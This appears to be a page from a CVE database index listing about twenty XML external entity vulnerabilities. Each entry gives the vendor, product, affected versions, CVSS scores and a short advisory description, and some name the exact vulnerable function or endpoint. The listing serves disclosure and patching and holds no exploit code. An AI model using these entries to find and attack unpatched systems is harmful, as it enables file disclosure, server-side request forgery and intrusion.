Total
1035 CVE
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
---|---|---|---|---|---|
CVE-2021-44477 | 1 Ge | 1 Toolboxst | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH |
GE Gas Power ToolBoxST Version v04.07.05C suffers from an XML external entity (XXE) vulnerability using the DTD parameter entities technique that could result in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project/template file. | |||||
CVE-2021-44147 | 1 Claris | 2 Filemaker Pro, Filemaker Server | 2024-11-21 | 4.3 MEDIUM | 5.5 MEDIUM |
An XML External Entity issue in Claris FileMaker Pro and Server (including WebDirect) before 19.4.1 allows a remote attacker to disclose local files via a crafted XML/Excel document and perform server-side request forgery attacks. | |||||
CVE-2021-44028 | 1 Quest | 1 Kace Desktop Authority | 2024-11-21 | 4.3 MEDIUM | 5.5 MEDIUM |
XXE can occur in Quest KACE Desktop Authority before 11.2 because the log4net configuration file might be controlled by an attacker, a related issue to CVE-2018-1285. | |||||
CVE-2021-43990 | 1 Fanuc | 1 Roboguide | 2024-11-21 | 2.6 LOW | 6.1 MEDIUM |
The affected product is vulnerable to a network-based attack by threat actors supplying a crafted, malicious XML payload designed to trigger an external entity reference call. | |||||
CVE-2021-43577 | 1 Jenkins | 1 Owasp Dependency-check | 2024-11-21 | 5.5 MEDIUM | 7.1 HIGH |
Jenkins OWASP Dependency-Check Plugin 5.1.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. | |||||
CVE-2021-43576 | 1 Jenkins | 1 Pom2config | 2024-11-21 | 4.3 MEDIUM | 6.5 MEDIUM |
Jenkins pom2config Plugin 1.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks, allowing attackers with Overall/Read and Item/Read permissions to have Jenkins parse a crafted XML file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery. | |||||
CVE-2021-43142 | 1 Jox Project | 1 Jox | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL |
An XML External Entity (XXE) vulnerability exists in wuta jox 1.16 in the readObject method in JOXSAXBeanInput. | |||||
CVE-2021-43090 | 1 Predic8 | 1 Soa Model | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL |
An XML External Entity (XXE) vulnerability exists in soa-model before 1.6.4 in the WSDLParser function. | |||||
CVE-2021-42776 | 1 Cloverdx | 1 Cloverdx | 2024-11-21 | 6.8 MEDIUM | 7.7 HIGH |
CloverDX Server before 5.11.2 and and 5.12.x before 5.12.1 allows XXE during configuration import. | |||||
CVE-2021-42646 | 1 Wso2 | 3 Api Manager, Identity Server, Identity Server As Key Manager | 2024-11-21 | 6.4 MEDIUM | 9.1 CRITICAL |
XML External Entity (XXE) vulnerability in the file based service provider creation feature of the Management Console in WSO2 API Manager 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; and WSO2 IS as Key Manager 5.7.0, 5.9.0, and 5.10.0; and WSO2 Identity Server 5.7.0, 5.8.0, 5.9.0, 5.10.0, and 5.11.0. Allows attackers to gain read access to sensitive information or cause a denial of service via crafted GET requests. | |||||
CVE-2021-42560 | 1 Mitre | 1 Caldera | 2024-11-21 | 6.5 MEDIUM | 8.8 HIGH |
An issue was discovered in CALDERA 2.9.0. The Debrief plugin receives base64 encoded "SVG" parameters when generating a PDF document. These SVG documents are parsed in an unsafe manner and can be leveraged for XXE attacks (e.g., File Exfiltration, Server Side Request Forgery, Out of Band Exfiltration, etc.). | |||||
CVE-2021-42537 | 1 Visam | 1 Vbase Web-remote | 2024-11-21 | N/A | 5.9 MEDIUM |
VISAM VBASE version 11.6.0.6 processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. | |||||
CVE-2021-42194 | 1 Eyoucms | 1 Eyoucms | 2024-11-21 | 6.5 MEDIUM | 7.2 HIGH |
The wechat_return function in /controller/Index.php of EyouCms V1.5.4-UTF8-SP3 passes the user's input directly into the simplexml_ load_ String function, which itself does not prohibit external entities, triggering a XML external entity (XXE) injection vulnerability. | |||||
CVE-2021-41770 | 1 Pingidentity | 1 Pingfederate | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH |
Ping Identity PingFederate before 10.3.1 mishandles pre-parsing validation, leading to an XXE attack that can achieve XML file disclosure. | |||||
CVE-2021-41411 | 1 Redhat | 1 Drools | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL |
drools <=7.59.x is affected by an XML External Entity (XXE) vulnerability in KieModuleMarshaller.java. The Validator class is not used correctly, resulting in the XXE injection vulnerability. | |||||
CVE-2021-41098 | 1 Nokogiri | 1 Nokogiri | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH |
Nokogiri is a Rubygem providing HTML, XML, SAX, and Reader parsers with XPath and CSS selector support. In Nokogiri v1.12.4 and earlier, on JRuby only, the SAX parser resolves external entities by default. Users of Nokogiri on JRuby who parse untrusted documents using any of these classes are affected: Nokogiri::XML::SAX::Parse, Nokogiri::HTML4::SAX::Parser or its alias Nokogiri::HTML::SAX::Parser, Nokogiri::XML::SAX::PushParser, and Nokogiri::HTML4::SAX::PushParser or its alias Nokogiri::HTML::SAX::PushParser. JRuby users should upgrade to Nokogiri v1.12.5 or later to receive a patch for this issue. There are no workarounds available for v1.12.4 or earlier. CRuby users are not affected. | |||||
CVE-2021-41042 | 1 Eclipse | 1 Lyo | 2024-11-21 | 5.0 MEDIUM | 5.3 MEDIUM |
In Eclipse Lyo versions 1.0.0 to 4.1.0, a TransformerFactory is initialized with the defaults that do not restrict DTD loading when working with RDF/XML. This allows an attacker to cause an external DTD to be retrieved. | |||||
CVE-2021-40722 | 1 Adobe | 2 Experience Manager, Experience Manager Cloud Service | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL |
AEM Forms Cloud Service offering, as well as version 6.5.10.0 (and below) are affected by an XML External Entity (XXE) injection vulnerability that could be abused by an attacker to achieve RCE. | |||||
CVE-2021-40510 | 1 Obdasystems | 1 Mastro | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH |
XML eXternal Entity (XXE) in OBDA systems’ Mastro 1.0 allows remote attackers to read system files via custom DTDs. | |||||
CVE-2021-40500 | 1 Sap | 1 Businessobjects Business Intelligence Platform | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH |
SAP BusinessObjects Business Intelligence Platform (Crystal Reports) - versions 420, 430, allows an unauthenticated attacker to exploit missing XML validations at endpoints to read sensitive data. These endpoints are normally exposed over the network and successful exploitation can enable the attacker to retrieve arbitrary files from the server. |